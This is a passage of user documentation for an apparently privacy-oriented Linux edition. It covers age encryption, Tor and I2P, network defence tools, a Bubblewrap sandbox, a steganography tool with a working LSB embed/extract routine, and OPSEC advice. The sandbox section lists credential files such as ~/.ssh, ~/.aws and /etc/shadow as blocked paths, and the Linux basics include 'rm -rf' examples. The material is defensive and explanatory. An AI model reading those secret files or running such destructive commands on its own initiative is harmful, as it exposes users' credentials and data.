  1. Select "1" or "2" (Public key / Passphrase)
  2. Enter message (Ctrl+D to finish)
  3. Encrypted message is displayed

Example Output:

-----BEGIN AGE ENCRYPTED FILE-----
YWdlLWVuY3J5cHRpb24ub3JnL3YxCi0+IFgyNTUxOSBxRjVqVGhWL2RxZGZHdGFV
...
-----END AGE ENCRYPTED FILE-----

6. Decrypt Message

Decrypts an encrypted message.

Usage:

  1. Select "1" or "2" (Private key / Passphrase)
  2. Paste encrypted message (Ctrl+D to finish)
  3. Decrypted message is displayed

7. Secure Delete File

Securely deletes a file.

Process:

  1. Enter file path
  2. Confirm (yes)
  3. File is overwritten 3 times with random data
  4. File is deleted

Warning: This operation is irreversible! Note also that on SSDs and on copy-on-write or journaling filesystems, overwriting a file does not guarantee that the old blocks are gone (wear levelling and snapshots keep copies); full-disk encryption is the reliable defence against recovery of deleted files.

Age Encryption

What is it?

Age is a modern and simple file encryption tool. Its key pairs work much like SSH keys, and age can also encrypt to existing ssh-ed25519 and ssh-rsa public keys.

Advantages

  • Simple: Easy to use
  • Secure: Modern cryptography (X25519, ChaCha20-Poly1305)
  • Fast: High performance
  • Portable: Single binary

Public Key Format

age1xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
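An age recipient is a Bech32 string with the human-readable part "age" wrapping a 32-byte X25519 public key, and an identity uses "AGE-SECRET-KEY-" in the same way; the Bech32 checksum is what lets a client reject a key that was mistyped or truncated in a chat paste. The following is an added example of encoding and validating those strings (it is not age's or Fangbullcrypt's code), using constructed key bytes rather than a real key pair.

```python
"""Encode and validate age recipient/identity strings (added example, not age code).

Recipients are Bech32 with HRP "age" (62 characters); identities use the HRP
"age-secret-key-" and are written in upper case. The checksum detects any
single-character error, which is what the "wrong key" check relies on.
"""
CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"
GENERATOR = [0x3B6A57B2, 0x26508E6D, 0x1EA119FA, 0x3D4233DD, 0x2A1462B3]


def _polymod(values):
    chk = 1
    for v in values:
        top = chk >> 25
        chk = ((chk & 0x1FFFFFF) << 5) ^ v
        for i in range(5):
            if (top >> i) & 1:
                chk ^= GENERATOR[i]
    return chk


def _hrp_expand(hrp):
    return [ord(c) >> 5 for c in hrp] + [0] + [ord(c) & 31 for c in hrp]


def _checksum(hrp, data):
    polymod = _polymod(_hrp_expand(hrp) + data + [0] * 6) ^ 1
    return [(polymod >> 5 * (5 - i)) & 31 for i in range(6)]


def _convertbits(data, frombits, tobits, pad=True):
    """Regroup a bit stream (8->5 for encoding, 5->8 for decoding)."""
    acc = bits = 0
    out, maxv = [], (1 << tobits) - 1
    for value in data:
        acc = (acc << frombits) | value
        bits += frombits
        while bits >= tobits:
            bits -= tobits
            out.append((acc >> bits) & maxv)
    if pad:
        if bits:
            out.append((acc << (tobits - bits)) & maxv)
    elif bits >= frombits or ((acc << (tobits - bits)) & maxv):
        raise ValueError("invalid padding")
    return out


def bech32_encode(hrp, payload):
    data = _convertbits(list(payload), 8, 5)
    return hrp + "1" + "".join(CHARSET[d] for d in data + _checksum(hrp, data))


def bech32_decode(s):
    if s.lower() != s and s.upper() != s:
        raise ValueError("mixed-case string")
    s = s.lower()
    pos = s.rfind("1")
    if pos < 1:
        raise ValueError("missing separator")
    hrp, data = s[:pos], [CHARSET.find(c) for c in s[pos + 1:]]
    if -1 in data or len(data) < 6:
        raise ValueError("invalid character or too short")
    if _polymod(_hrp_expand(hrp) + data) != 1:
        raise ValueError("bad checksum")
    return hrp, bytes(_convertbits(data[:-6], 5, 8, pad=False))


def encode_recipient(public_key):
    return bech32_encode("age", public_key)


def encode_identity(secret_key):
    return bech32_encode("age-secret-key-", secret_key).upper()


def parse_recipient(s):
    hrp, payload = bech32_decode(s)
    if hrp != "age" or len(payload) != 32:
        raise ValueError("not an age recipient")
    return payload


def parse_identity(s):
    hrp, payload = bech32_decode(s)
    if hrp != "age-secret-key-" or len(payload) != 32:
        raise ValueError("not an age identity")
    return payload


if __name__ == "__main__":
    demo_pk = bytes(range(32))          # constructed, not a real key
    print(encode_recipient(demo_pk), len(encode_recipient(demo_pk)))
```

A recipient that passes this check is well-formed, not necessarily the right person's key: the checksum protects against transcription errors, while confirming whose key it is still requires comparing it over a trusted channel.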

Decryption Failed

Problem: Decryption failed

Solution:

  • Ensure correct key/passphrase is used
  • File must not be corrupted
  • Age version must be compatible

Frequently Asked Questions

Q: How secure is Age?
A: Uses modern cryptography (X25519, ChaCha20-Poly1305), industry standard.

Q: Is it safe to share public keys?
A: Yes, public keys can be shared. Private keys should never be shared.

Q: What if I forget my passphrase?
A: File cannot be recovered, lost if no backup exists.

Q: Can large files be encrypted?
A: Yes, age uses streaming encryption, no file size limit.

Q: Can encrypted files be opened on other systems?
A: Yes, can be opened on any system with age installed.

Q: Is multiple recipient supported?
A: Yes, you can encrypt with multiple public keys.

Security Notes

Important

  1. Private Key: Never share or lose it
  2. Passphrase: Use strong and memorable password
  3. Backup: Backup keys and important files
  4. Secure Delete: Securely delete original files

Firefox Root0Edition

Cyrethium Root0 Edition's default Firefox variant is based on Amnesic Firefox. For more information, please review the Amnesic Firefox documentation.

I2P Guide

I2P (Invisible Internet Project) is an anonymous, peer-to-peer network layer. Its primary purpose is to provide anonymous access to services hosted within I2P (eepsites, mail, bittorrent, etc.) and to other I2P users. Unlike Tor, I2P is more suitable for fully in-network services; clearnet exit (outproxy) is limited.

Core Components

Router (I2P node): Each user runs their own I2P router which acts as both client and relay.

Tunnels: Traffic travels through unidirectional tunnels, with separate inbound and outbound tunnels for each router. Each tunnel is a series of hops, and replies come back through a different tunnel than the one the request used.

RouterInfo & LeaseSets: User reachability information is shared to enable addressing services.

How It Works

  1. Each I2P node establishes its own inbound and outbound tunnels by selecting various hops.
  2. Communication between two hosts occurs through the intersection of sender's outbound tunnel and receiver's inbound tunnel.
  3. I2P addresses are long, base32-like strings resolved via LeaseSet/RouterInfo.
  4. I2P continuously renews tunnels and updates routing tables, making tracking difficult.
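The "base32-like" addresses in step 3 are derived deterministically: a .b32.i2p hostname is the SHA-256 of the serialized destination, base32-encoded without padding and lower-cased, which is why an address can be checked against the destination it claims to stand for. The following is an added example of that derivation and check (it is not I2P's code); the destination bytes are constructed, not a real router's.

```python
"""Derive and check I2P .b32.i2p addresses (added example, not I2P code).

b32 address = base32(sha256(destination)).lower() without padding + ".b32.i2p".
Address-book "destination" strings use I2P's base64 alphabet, which replaces
'+' and '/' with '-' and '~'. The destination bytes here are constructed.
"""
import base64
import hashlib
import re

B32_RE = re.compile(r"^[a-z2-7]{52}\.b32\.i2p$")


def b32_address(destination: bytes) -> str:
    digest = hashlib.sha256(destination).digest()
    return base64.b32encode(digest).decode().rstrip("=").lower() + ".b32.i2p"


def looks_like_b32(addr: str) -> bool:
    """Cheap syntax check before doing anything with a pasted address."""
    return bool(B32_RE.match(addr))


def to_i2p_base64(destination: bytes) -> str:
    return base64.b64encode(destination).decode().replace("+", "-").replace("/", "~")


def from_i2p_base64(text: str) -> bytes:
    return base64.b64decode(text.replace("-", "+").replace("~", "/"))


def matches_destination(addr: str, destination_b64: str) -> bool:
    """True if a shared b32 address really belongs to the shared destination."""
    return looks_like_b32(addr) and addr == b32_address(from_i2p_base64(destination_b64))


if __name__ == "__main__":
    fake_dest = bytes(range(256)) + bytes(range(131))   # constructed, 387 bytes
    print(b32_address(fake_dest))
```

When someone hands you both a destination and a b32 address for a service, matches_destination is the check that catches a swapped address; a b32 address on its own can only be compared against one you already trust.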

I2P vs Tor

In-Network Service Focused: I2P excels at accessing anonymous internal services (eepsites). Tor facilitates access to clearnet targets via exit nodes.

Connection Model: I2P establishes asymmetric indirect connections with tunnels; Tor is client-centric with routes established by the client.

Performance: I2P is designed for low-latency applications and service hosting, but varies by use case.

Security Points

Addressing Complexity: I2P addresses are unreadable to humans; incorrect address sharing can easily redirect traffic.

Outproxy Limitations: Exit from I2P to clearnet is limited and generally reduces security/anonymity level.

Overlay Network: I2P is completely an overlay network; node uptime and bandwidth directly affect network performance.

Application Notes for Cyrethium

Be careful when running I2P and Tor simultaneously: different tunneling logic and DNS-like resolution mechanisms can cause confusion.

NetSecDragon - Wireless Security Toolkit

Overview

NetSecDragon is a comprehensive security toolkit that combines 4 different network security modules in a single interface. It detects DDoS, port scan, MITM, and WiFi deauth attacks.

Modules

  • ANTI-FLOOD: DDoS & Flood Detection
  • ANTI-SCAN: Port Scan Detection
  • ANTI-MITM: ARP & MITM Detection
  • ANTI-DEAUTH: WiFi Deauth Detection

Usage

sudo netsecdragon

Note: Root privileges required.

Security Notes

Important:

  • Root Required: All modules require root privileges
  • Tor Awareness: Automatically ignores Tor traffic
  • False Positive: Legitimate high traffic may be detected as an attack

Tips: Adjust thresholds according to your network to reduce false positives.

OpenMammoth Firewall - Advanced iptables Firewall

Overview

OpenMammoth Firewall is an iptables-based firewall providing comprehensive protection against DDoS, port scans, packet manipulation, and various network attacks.

Features

  • SYN Flood Protection: Hash-based rate limiting
  • Port Scan Protection: Automatic detection and blocking
  • Packet Manipulation Protection: Mangle table rules
  • Connection Rate Limiting: Connection count limiting
  • Anti-Spoofing: Blocks packets with spoofed (fake) source IP addresses
  • Tor Compatibility: Detects Tor traffic and prevents conflicts
  • IPv6 Firewall Support: Full IPv6 security rules

Usage

sudo openmammoth-firewall

Main Menu

1. Enable O.M. Firewall: Enables the firewall and applies all security rules.

2. Disable O.M. Firewall: Disables the firewall and clears all rules.

3. Status O.M. Firewall: Shows firewall status and active rules.

4. Exit: Exits the program.

Tor Detection Mechanism

OpenMammoth Firewall detects Tor usage and prevents conflicts. If the firewall is enabled while Tor is active, it may delete Tor's NAT rules; traffic then stops going through Tor, the real IP may leak, and the system can become unstable.

Important: You must disable OpenMammoth Firewall before routing all traffic to Tor.

Why Does It Conflict with Tor?

  • Tor NAT rules are deleted
  • Traffic does not go to Tor
  • Real IP may leak
  • System becomes unstable

Enabling Tor routing after OpenMammoth Firewall

  • Disables OpenMammoth Firewall
  • May disrupt Tor traffic and cause internet outages
  • You must disable OpenMammoth Firewall before routing all traffic to Tor

Security Notes

CRITICAL WARNINGS:

  1. Tor Usage: Stop Tor before enabling the firewall
  2. SSH Access: Check SSH rules if remotely connected
  3. Service Interruption: Some services may be affected
  4. IPv6 Protection: IPv6 rules are automatically added
  5. Dual-Stack: Both IPv4 and IPv6 are protected

Plaztek - Lightweight Sandbox System

Overview

Plaztek is a user-based lightweight sandbox system designed to safely run untrusted scripts and projects. It creates secure isolated environments using Bubblewrap (bwrap).

Basic Usage

# Simple script execution
plaztek --profile strict suspicious_script.sh

# Directory sandboxing
plaztek --profile medium --dir ~/downloads/ProjectX

# Run with writable mode
plaztek --profile strict --writable --dir ~/myproject -- /bin/bash

# Run without network
plaztek --profile paronid --disable-network script.py

Security Profiles

Basic Profile: Only critical system files are blocked. Minimal restrictions, fast execution, suitable for development.

Medium Profile: Medium security level, suitable for development. Balanced security/performance, most system files protected.

Strict Profile: Tight security for untrusted code. High security level, most system resources blocked, minimal system access.

Paronid Profile: Maximum security with heaviest restrictions. Maximum isolation, all critical resources blocked, minimal system interaction.

Configuration

Profiles: /etc/plaztek.d/profiles/

Custom Configurations: /etc/plaztek.d/

User Configuration: ~/.config/plaztek/config.json

Ephemeral (Temporary) Copying

In writable mode, a temporary copy of the source directory is created. Changes are made only to the temporary copy, and the original directory remains unchanged. The temporary copy is automatically deleted when the sandbox closes.

Network Isolation

Use --disable-network to block all external connections while preserving localhost access. DNS queries are also blocked.

Custom Configuration

Create Custom Configuration:

# Create custom configuration file
sudo nano /etc/plaztek.d/myconfig.conf

Example Configuration:

# One blocking path per line
/home/user/.ssh
/home/user/.gnupg
/home/user/.aws
/home/user/.docker
/etc/shadow
/etc/passwd
/root

Wildcard Usage:

/home/user/.ssh/*
/etc/systemd/*
/var/log/*

List Configurations:

# List all available configurations
plaztek --list-configs

Command Line Options

Basic Options:

  • --profile PROFILE: Use security profile (basic|medium|strict|paronid)
  • --config NAME: Load configuration file (can be used multiple times)
  • --enable-network / --disable-network: Enable or disable network access
  • --dir PATH: Sandbox a whole directory rather than a single file
  • --writable: Create ephemeral copy for write access

Advanced Options:

  • --dry-run: Show what would be done without executing
  • --list-configs: List all available configuration files
  • --bwrap-arg ARG: Pass additional argument to Bubblewrap

Usage Examples

Example 1: Run Untrusted Script

# Run with maximum security
plaztek --profile paronid suspicious_script.sh

Example 2: Inspect Project Directory

# Without network, strict mode
plaztek --profile strict --disable-network --dir ~/downloads/ProjectX

Example 3: Writable Test Environment

# Make changes in temporary copy
plaztek --profile medium --writable --dir ~/myproject -- /bin/bash

Example 4: Custom Configuration

# Multiple configuration files
plaztek --config critical --config services --config security script.py

Example 5: Python Script Analysis

# Strict mode, no network
plaztek --profile strict --disable-network analyze_this.py

Example 6: Development Environment

# Medium profile, writable mode
plaztek --profile medium --writable --dir ~/dev/new-project -- /bin/bash

Troubleshooting

Bubblewrap Not Found

Problem: bubblewrap command not found

# Debian/Ubuntu
sudo apt install bubblewrap

User Namespace Error

Problem: "Unprivileged user namespaces are disabled"

# Enable temporarily (the setting does not persist across reboots)
sudo sysctl kernel.unprivileged_userns_clone=1

Configuration File Not Found

Problem: "Configuration file not found"

# Check available configurations
plaztek --list-configs

# Use correct configuration name
plaztek --config ssh script.sh

Insufficient Disk Space

Problem: "Not enough space in /tmp for ephemeral copy"

# Clean /tmp space
sudo rm -rf /tmp/plaztek-*

# Or use smaller directory
# Or run without --writable

File Not Found

Problem: "File not found" error

# Use absolute path
plaztek --profile strict /home/user/script.sh

Limitations

1. Root-Required Operations

Plaztek cannot run operations requiring root:

  • System services
  • Kernel modules
  • Privileged ports (< 1024)

2. Hardware Access

Direct hardware access is limited:

  • USB devices
  • Graphics cards (3D)
  • Sound cards (with --nosound)

3. X11 Applications

GUI applications may require additional configuration:

plaztek --bwrap-arg "--ro-bind /tmp/.X11-unix /tmp/.X11-unix" gui-app

Performance Tips

1. Profile Selection

Less restriction means faster execution; restrictiveness increases in the order basic < medium < strict < paronid.

2. Ephemeral Copying

Can be slow for large directories. Only use --writable when needed.

3. Configuration Optimization

Remove unnecessary blocking rules.

Frequently Asked Questions

Q: Does Plaztek require root?
A: No, it runs as a normal user. However, root may be needed to create configuration files.

Q: Can multiple profiles be used simultaneously?
A: No. Only one profile can be active at a time, but several configuration files can be loaded together with repeated --config options.

Q: Can you escape from sandbox?
A: Not by design, but the risk exists if there are bugs in the kernel or in Bubblewrap.

Q: What is the performance impact?
A: Minimal. Only a small delay at startup.

Q: What is the difference from Docker?
A: Plaztek is lighter and faster. Docker requires container images, Plaztek does not.

Riki - Steganography Tool

Overview

Riki is an advanced command-line tool that hides data in, and extracts it from, image (PNG, BMP, TIFF, PPM, TGA) and audio (WAV) files using the LSB (Least Significant Bit) steganography technique.

Commands

1. capacity - Calculate Carrier Capacity

Calculates how much data a carrier file can store.

Usage:

riki capacity -c <carrier_file> [options]

Parameters:

  • -c, --carrier (required): Carrier file (PNG/BMP/TIFF/PPM/TGA or WAV)
  • -b, --bits: LSB bit count (1-4, default: 1)
  • -v, --verbose: Detailed output

Example:

riki capacity -c image.png -b 2 -v

2. embed - Hide Data

Hides a file inside a carrier file.

Usage:

riki embed -c <carrier> -i <input_file> -o <output> [options]

Parameters:

  • -c, --carrier (required): Input carrier file
  • -i, --input (required): File to hide
  • -o, --output (required): Output stego file
  • -b, --bits: LSB bit count (1-4, default: 1)
  • --compress: Enable zlib compression
  • -p, --password: Password for AES-GCM encryption
  • --scatter: Randomly distribute data (except header)
  • --seed: Seed value for distribution (default: 0)
  • --digest: Add SHA-256 verification digest
  • -v, --verbose: Detailed output

Example:

riki embed -c photo.png -i secret.txt -o stego.png -b 2 --compress -p mypassword --digest -v

3. extract - Extract Data

Extracts hidden data from stego file.

Usage:

riki extract -s <stego_file> [options]

Parameters:

  • -s, --stego (required): Stego file
  • -o, --output: Output file path (auto if not specified)
  • --overwrite: Overwrite if exists
  • -p, --password: Decryption password if encrypted
  • -v, --verbose: Detailed output

Example:

riki extract -s stego.png -o extracted.txt -p mypassword -v

4. analyze - Stego Analysis

Shows stego file metadata and header information.

Usage:

riki analyze -s <stego_file> [options]

Parameters:

  • -s, --stego (required): Stego file to analyze
  • --pretty: Show formatted JSON output
  • -v, --verbose: Detailed output

Example:

riki analyze -s stego.png --pretty

Features

Security

  • AES-GCM Encryption: AES-256 in GCM mode (authenticated encryption)
  • Scrypt KDF: Scrypt algorithm for password derivation (N=2^14, r=8, p=1)
  • SHA-256 Verification: Data integrity check

Performance

  • Zlib Compression: Automatic size optimization
  • Multi-LSB Support: 1-4 bit LSB usage
  • Scatter Mode: Randomly distribute data to make analysis harder

Supported Formats

  • Images: PNG, BMP, TIFF, TIF, TGA, PPM, PNM, PGM, PBM
  • Audio: WAV

Technical Notes

  • LSB Bit Count: Higher bit count provides more capacity but increases detectability
  • Scatter Mode: Header is always sequential, only payload is distributed
  • Auto Detection: Extract and analyze commands automatically detect LSB bit count
  • Capacity Formula: (carrier_byte_count * lsb_bits) / 8
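
A compact LSB embed/extract routine, added here as an illustration and not taken from Riki, showing the capacity formula, the sequential header from which the bit count is auto-detected, and seed-based scatter of the payload. The header layout, the "EX" marker and the pseudo-random carrier are constructed assumptions; Riki's real on-disk format, encryption and compression are not reproduced.

```python
import random
import struct

MAGIC = b"EX"                    # assumed marker; Riki's real header is not on this page
HEADER_LEN = 7                   # magic (2) + LSB bit count (1) + payload length (4)
HEADER_SAMPLES = HEADER_LEN * 8  # the header always uses 1 LSB per sample, sequentially

# Constructed carrier: 4096 pseudo-random bytes standing in for raw pixel/audio samples.
_rng = random.Random(1)
CARRIER = bytes(_rng.getrandbits(8) for _ in range(4096))

def capacity_bytes(carrier_len, bits):
    """The page's capacity formula: (carrier_byte_count * lsb_bits) / 8."""
    if not 1 <= bits <= 4:
        raise ValueError("LSB bit count must be 1-4")
    return carrier_len * bits // 8

def _bits(data):
    return [(b >> i) & 1 for b in data for i in range(7, -1, -1)]

def _bytes(bits):
    return bytes(int("".join(map(str, bits[i:i + 8])), 2)
                 for i in range(0, len(bits) - len(bits) % 8, 8))

def _write(samples, idx, value, width):
    mask = (1 << width) - 1                       # overwrite only the low `width` bits
    samples[idx] = (samples[idx] & ~mask & 0xFF) | (value & mask)

def _payload_positions(carrier_len, seed):
    """Scatter mode: a seed-determined permutation of the samples after the header."""
    pos = list(range(HEADER_SAMPLES, carrier_len))
    random.Random(seed).shuffle(pos)
    return pos

def embed(carrier, payload, bits=1, seed=0):
    samples = bytearray(carrier)
    if len(payload) > capacity_bytes(len(samples) - HEADER_SAMPLES, bits):
        raise ValueError("Insufficient capacity")
    header = MAGIC + bytes([bits]) + struct.pack(">I", len(payload))
    for i, bit in enumerate(_bits(header)):       # header: sequential, 1 LSB/sample
        _write(samples, i, bit, 1)
    pbits = _bits(payload)
    pbits += [0] * (-len(pbits) % bits)           # pad to whole `bits`-wide groups
    pos = _payload_positions(len(samples), seed)
    for k in range(0, len(pbits), bits):          # payload: scattered, `bits` LSBs/sample
        value = int("".join(map(str, pbits[k:k + bits])), 2)
        _write(samples, pos[k // bits], value, bits)
    return bytes(samples)

def extract(stego, seed=0):
    """Auto-detects the LSB bit count from the sequential header, then de-scatters."""
    samples = bytes(stego)
    if len(samples) < HEADER_SAMPLES:
        raise ValueError("No hidden data found")
    header = _bytes([samples[i] & 1 for i in range(HEADER_SAMPLES)])
    if header[:2] != MAGIC or not 1 <= header[2] <= 4:
        raise ValueError("No hidden data found")
    bits, length = header[2], struct.unpack(">I", header[3:])[0]
    groups = (length * 8 + bits - 1) // bits
    pos = _payload_positions(len(samples), seed)
    if groups > len(pos):
        raise ValueError("No hidden data found")
    out = []
    for k in range(groups):
        v = samples[pos[k]] & ((1 << bits) - 1)
        out += [(v >> i) & 1 for i in range(bits - 1, -1, -1)]
    return _bytes(out[:length * 8]), bits

def distortion(carrier, stego):
    """Changed-sample count and largest per-sample delta; both grow with the bit count."""
    deltas = [abs(a - b) for a, b in zip(carrier, stego)]
    return sum(1 for d in deltas if d), max(deltas)
```

Running distortion() on the same payload with bits=1 and bits=4 makes the detectability trade-off concrete: the largest per-sample change grows from 1 to 15.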

Error Messages

  • Insufficient capacity: The carrier is too small; use a larger carrier file or a higher LSB bit count
  • No hidden data found: No hidden data in file or wrong format
  • Encrypted payload: Encrypted data requires -p parameter
  • SHA-256 digest mismatch: Data integrity compromised

Security Recommendations

  1. Strong Password: At least 16 characters, mixed characters
  2. Use Scatter: Enable scatter mode to make analysis harder
  3. Low LSB: Use 1-2 bits to reduce detectability
  4. Digest Verification: Use --digest for data integrity
  5. Secure Delete: Securely delete original files

Performance Tips

  • Use --compress for large files
  • Prefer 3-4 bit LSB for high capacity
  • WAV files generally offer higher capacity
  • PNG is preferred as it's a lossless format

Tor Guide

Tor (The Onion Router) routes network traffic through a series of volunteer-operated nodes using multi-layered (onion-like) encryption. Its purpose is to weaken the link between source (user) and destination (server), making it difficult for third parties to correlate identity and location.

Core Components

Entry/Guard Node: The first node the user connects to. Sees the user's real IP address but has no information about the request's destination.

Middle/Relay Node: Carries traffic; bridges between source and destination but doesn't directly see the identity of either side.

Exit Node: Exit point between Tor network and final destination (e.g., web server). Normal (clearnet) connection is made here — the destination sees requests coming from the Tor network.

Directory Servers: Servers that publish the Tor network's node list; clients learn available nodes from here.

How It Works — Step by Step

  1. Tor pulls the current node list from directory servers.
  2. Client selects a random but policy-compliant route: Guard → Middle → Exit (usually 3 hops). Guard nodes are generally chosen as stable and trusted.
  3. Client creates multi-layered (onion) encryption with separate keys for each hop — data consists of nested layers.
  4. When sending the packet, each node decrypts (opens) its own layer and forwards the result to the next node. The last node (exit) removes the final layer and sends the request to the destination, in the clear unless the application itself uses TLS.
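
The three-hop exchange in steps 3 and 4, as an added example that is not part of the original guide and not Tor's real protocol: the route, the per-hop keys and the HMAC-based toy cipher are constructed for illustration (Tor negotiates keys per circuit and uses AES-CTR). It shows that each node strips exactly one layer and learns only the next hop, and that only the exit holds the plaintext request.

```python
import hashlib
import hmac

# Constructed per-hop keys. Real Tor derives a fresh key per hop and per circuit
# through a handshake; fixed constants are used here only to keep the demo short.
KEYS = {"guard": b"key-guard", "middle": b"key-middle", "exit": b"key-exit"}
ROUTE = ["guard", "middle", "exit"]

def _layer(key, data):
    """Toy symmetric cipher: XOR with an HMAC-SHA256 counter keystream (not Tor's AES-CTR).
    XOR is its own inverse, so the same call both adds and removes a layer."""
    out = bytearray()
    for off in range(0, len(data), 32):
        ks = hmac.new(key, off.to_bytes(4, "big"), hashlib.sha256).digest()
        out += bytes(a ^ b for a, b in zip(data[off:off + 32], ks))
    return bytes(out)

def build_onion(route, destination, request):
    """Client side (step 3): wrap the request once per hop, innermost (exit) layer first.
    Each layer's plaintext is '<next hop>\\0<inner blob>'; only the exit's layer
    names the real destination."""
    blob, next_hop = request, destination
    for hop in reversed(route):
        blob = _layer(KEYS[hop], next_hop.encode() + b"\0" + blob)
        next_hop = hop
    return blob                        # handed to route[0], the guard

def peel(hop, blob):
    """Relay side (step 4): strip exactly one layer and learn only the next hop."""
    label, _, inner = _layer(KEYS[hop], blob).partition(b"\0")
    return label.decode(errors="replace"), inner

def deliver(route, onion):
    """Walk the circuit and record what each node learned about the path."""
    learned, blob = {}, onion
    for hop in route:
        learned[hop], blob = peel(hop, blob)
    return learned, blob               # the exit ends up holding the plaintext request
```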

Security/Critical Points

Guard Node Tracking: If an attacker learns the user's guard node, they can build long-term associations. This is why clients keep the same guard for a long time instead of changing it often.

Exit Node Surveillance: Exit node can see exit traffic — especially non-HTTPS traffic. Therefore, sensitive data should never be sent without TLS.

Directory Server Manipulation: Fake nodes or directory manipulation can corrupt results; Tor network takes various measures against this but risk is never completely eliminated.

Performance & Privacy Trade-off

More hops give (theoretically) more privacy, but latency rises and throughput falls. Tor is generally suited to interactive, low-bandwidth applications (web browsing); it is not ideal for heavy traffic or streaming.

Application Notes for Cyrethium

System-wide Tor (forcing all traffic through Tor) is possible with the Cyrethonion tool. Always use HTTPS even over Tor — exit nodes can see traffic.

OPSEC Guide

Introduction — Why OPSEC?

OPSEC is the "art of being cautious" against external threats that target you. Using security tools alone is not enough; wrong habits, misconfigurations, or carelessness can nullify all efforts. Cyrethium provides tools and settings — OPSEC teaches you how to behave.

Basic Principles (Summary)

  • Minimum Information Principle: Don't share everything; if possible, share nothing.
  • Separation/Segmentation: Separate identity/work/project accounts, devices, and networks.
  • Reduce Persistence: Minimize traces; avoid unnecessary data storage.
  • Stay Updated: Keep software updated; close known vulnerabilities.
  • Act According to Threat Model: There's no one-size-fits-all OPSEC — develop policies based on your target.

Threat Model — Clarify This First

Each threat requires different measures. OPSEC is very different between a simple user and a targeted user.

OPSEC Checklist

  • Use unique, long passwords + MFA for accounts.
  • Keep personal/work data on separate accounts and devices.
  • Anonymize internet access as needed; use anonymity tools consciously.
  • Use task-based browser profiles (daily / sensitive / test). Pick the one that fits Cyrethium's Hardened / Amnesic distinction.
  • Keep backups, but encrypt them and restrict who can access them.
  • Review features like automatic backup, cloud sync on phone/device.
  • Don't open unknown emails, attachments, and links; be suspicious of phishing.
  • Physical device security: screen lock, encryption, BIOS/UEFI password, access control.
  • Close unnecessary services; develop a habit of monitoring open ports.

Deeper — Behavioral OPSEC

Separate Identities (Compartmentalization)

Never link personal social accounts, project/work accounts and test/anonymous accounts to each other. Use a different email, browser profile and session for each identity.

Trace Management

Pay attention to metadata and EXIF when sharing photos/media. Be careful with shareable files — path names, usernames, secret keys, etc.

Communication Security

Choose secure messaging tools; look for end-to-end encryption, device verification, and secure deletion features. If sensitive topics are required, verify the communication channel and identity with the other party in advance.

Device Protocol

When setting up a new device, install only necessary applications; change default passwords/services. Plan for device loss (remote lock, wipe, encryption key storage).

Social OPSEC

Avoid giving sensitive information online/in real life.

Cyrethium-Specific Recommendations

Hardened Firefox

Daily use, extension/performance balance. Use for daily tasks if it comes with sufficient privacy settings.

Amnesic Firefox

For sensitive tasks — for those who want more aggressive cleaning when session closes. However, ease of use may decrease; choose the right browser for the right job.

Tor Routing

Routing all traffic through Tor has benefits and limitations. Tor is a good privacy tool, but the exit node must be kept in mind: handle sensitive, identity-linking operations with care, because they pass through a Tor exit.

Final Word — Mindset

OPSEC is not a toolset; it is a matter of habit. Rather than repeating the same routine every morning, ask yourself "what traces will I leave today, who sees what, what am I sharing?". Cyrethium gives you tools — but the most powerful tool is still your attention.

Basic Linux Guide

This document is prepared for users new to Linux systems; it explains basic terminal commands, file paths, permission logic, and system structure in simple language.

Linux File System Logic

In Linux, everything is a file — devices, directories, even RAM.

Path          Description
/             Root directory (where everything starts)
/home         User directories (like /home/emir)
/etc          System configuration files
/bin & /sbin  Basic system commands (e.g., ls, cp, reboot)
/usr          Application files (most software lives here)
/var          Variable data (logs, cache, etc.)
/tmp          Temporary files
/dev          Hardware (example: /dev/sda = disk)
/proc         System processes and kernel information
/boot         Kernel, initramfs, and GRUB files
/root         Root user's home directory

Terminal Basics

Command   Description                 Example
pwd       Shows current directory     pwd → /home/emir
ls        Lists directory contents    ls -la → including hidden files
cd        Changes directory           cd /etc
cp        Copies file                 cp file.txt /tmp/
mv        Moves or renames file       mv test.txt new.txt
rm        Deletes file                rm -rf /tmp/*
mkdir     Creates new folder          mkdir logs
cat       Shows file content          cat /etc/hostname
sudo      Runs privileged command     sudo apt update
chmod     Changes file permissions    chmod +x script.sh

System Information

  • uname -a: Kernel version, system information
  • lsblk: Lists disks and partitions
  • df -h: Shows disk usage
  • free -h: Shows RAM usage
  • top / htop: Monitors active processes
  • whoami: Shows current user
  • hostnamectl: Machine name, kernel, architecture info

Permissions and Root

root = system god.

Normal user: lives in /home/user

Root: in /root directory

Switch to root: sudo -i

File permissions example: -rw-r--r-- = owner: read/write, group: read, others: read

Change permissions: chmod 755 script.sh
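
The permission logic above worked through as an added example (not part of the original guide): each rwx triplet is three bits, so "-rw-r--r--" is 644 and "rwxr-xr-x" is 755. The converter also handles the setuid/setgid/sticky markers (s, S, t, T) that show up in ls -l listings of files such as /usr/bin/sudo or /tmp.

```python
def symbolic_to_octal(mode):
    """'-rw-r--r--' -> '644', 'rwxr-sr-x' -> '2755'; accepts 9 or 10 characters."""
    if len(mode) == 10:
        mode = mode[1:]                   # drop the file-type column (-, d, l, ...)
    if len(mode) != 9:
        raise ValueError("expected rwx triplets for owner, group and others")
    special, digits = 0, []
    for who, triplet in enumerate((mode[0:3], mode[3:6], mode[6:9])):
        r, w, x = triplet
        value = (4 if r == "r" else 0) | (2 if w == "w" else 0)
        if x in "xst":
            value |= 1                    # lowercase s/t means execute is also set
        if x in "sS" and who < 2:
            special |= 4 >> who           # setuid = 4 (owner), setgid = 2 (group)
        if x in "tT" and who == 2:
            special |= 1                  # sticky bit lives in the others column
        digits.append(str(value))
    return (str(special) if special else "") + "".join(digits)

def octal_to_symbolic(octal):
    """'755' -> 'rwxr-xr-x'; '4755' -> 'rwsr-xr-x'. Takes a string like chmod does."""
    value = int(octal, 8)
    special, perm = value >> 9, value & 0o777
    out = []
    for who in range(3):
        bits = (perm >> (6 - 3 * who)) & 0o7
        r = "r" if bits & 4 else "-"
        w = "w" if bits & 2 else "-"
        x = "x" if bits & 1 else "-"
        flag = (special & (4 >> who)) if who < 2 else (special & 1)
        if flag:
            marker = "t" if who == 2 else "s"
            x = marker if bits & 1 else marker.upper()   # uppercase: no execute bit
        out.append(r + w + x)
    return "".join(out)

def explain(mode):
    """Spell out a 9/10-character mode the way the guide does."""
    if len(mode) == 10:
        mode = mode[1:]
    names = {"r": "read", "w": "write", "x": "execute"}
    result = {}
    for who, triplet in zip(("owner", "group", "others"), (mode[0:3], mode[3:6], mode[6:9])):
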